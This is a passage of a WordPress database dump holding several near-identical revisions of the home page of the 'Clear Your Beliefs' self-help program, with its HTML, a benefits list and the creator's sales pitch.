1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important;margin-top: 5px ! important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<p style="text-align: center"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p>\n<p style="text-align: center">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 45px"><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>\n\nCopyright 2014 Clear Your Beliefs', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-08 01:42:42', '2014-10-08 06:42:42', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1508, 2, '2014-10-09 17:07:33', '2014-10-09 22:07:33', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\nStep 1\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n[Form id="10"]\nStep 2\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;">Start Clearing Whatever Is In The Way Right Now<a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\nStep 3\n<p style="text-align: center"><strong>Learn about the </strong><strong><em>CLEAR YOUR BELIEFS</em></strong><strong> Program</strong></p>\n<p style="text-align: center"> Clear Limiting andNegative BeliefsPermanently. Eliminate Beliefs that BlockAbundance, Love,Relationships, andManifesting What You Want</p>\n<p style="text-align: center;margin-bottom: 70px"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> </strong></p><p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 45px;"><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>\n\nCopyright 2014 Clear Your Beliefs', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-09 17:07:33', '2014-10-09 22:07:33', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1509, 2, '2014-10-09 17:09:25', '2014-10-09 22:09:25', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\nStep 1\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n[Form id="10"]\nStep 2\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;">Start Clearing Whatever Is In The Way Right Now<a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\nStep 3\n<p style="text-align: center"><strong>Learn about the </strong><strong><em>CLEAR YOUR BELIEFS</em></strong><strong>Program</strong></p>\n<p style="text-align: center"> Clear Limiting and\nNegative Beliefs\nPermanently.\n<p>Eliminate Beliefs that Block\nAbundance, Love,\nRelationships, and\nManifesting What You Want</p>\n<p style="text-align: center;margin-bottom: 70px"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> </strong></p><p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 45px;"><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>\n\nCopyright 2014 Clear Your Beliefs', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-09 17:09:25', '2014-10-09 22:09:25', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1510, 2, '2014-10-09 17:10:50', '2014-10-09 22:10:50', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\nStep 1\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n[Form id="10"]\nStep 2\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;">Start Clearing Whatever Is In The Way Right Now<a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\nStep 3\n<p style="text-align: center"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong></p>\n<p style="text-align: center"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p>Eliminate Beliefs that Block\nAbundance, Love,\nRelationships, and\nManifesting What You Want</p>\n\n<p style="text-align: center;margin-bottom: 70px"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> </strong></p><p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 45px;"><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>\n\nCopyright 2014 Clear Your Beliefs', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-09 17:10:50', '2014-10-09 22:10:50', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1511, 2, '2014-10-09 17:12:00', '2014-10-09 22:12:00', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\nStep 1\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n[Form id="10"]\nStep 2\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;">Start Clearing Whatever Is In The Way Right Now<a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\nStep 3\n<p style="text-align: center"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></p>\n\n<p style="text-align: center"><strong>Eliminate Beliefs that Block\nAbundance, Love,\nRelationships, and\nManifesting What You Want</strong></p>\n\n<p style="text-align: center;margin-bottom: 70px"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> </strong></p><p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 45px;"><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>\n\nCopyright 2014 Clear Your Beliefs', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-09 17:12:00', '2014-10-09 22:12:00', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1512, 2, '2014-10-09 17:12:48', '2014-10-09 22:12:48', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\nStep 1\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n[Form id="10"]\nStep 2\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;">Start Clearing Whatever Is In The Way Right Now<a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\nStep 3\n<p style="text-align: center"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center"><strong>Eliminate Beliefs that\nBlock Abundance, Love,\nRelationships, and\nManifesting What You Want</strong>\n\n<p style="text-align: center;margin-bottom: 70px"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> </strong></p><p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 45px;"><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>\n\nCopyright 2014 Clear Your Beliefs', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-09 17:12:48', '2014-10-09 22:12:48', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1514, 2, '2014-10-09 17:14:26', '2014-10-09 22:14:26', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\n<p>Step 1</p><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /><p> [Form id="10"] </p>Step 2\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center">Start Clearing Whatever Is In The Way Right Now<a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\nStep 3\n<p style="text-align: center"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center"><strong>Eliminate Beliefs that\nBlock Abundance, Love,\nRelationships, and\nManifesting What You Want</strong>\n\n<p style="text-align: center;margin-bottom: 70px"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> </strong></p><p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  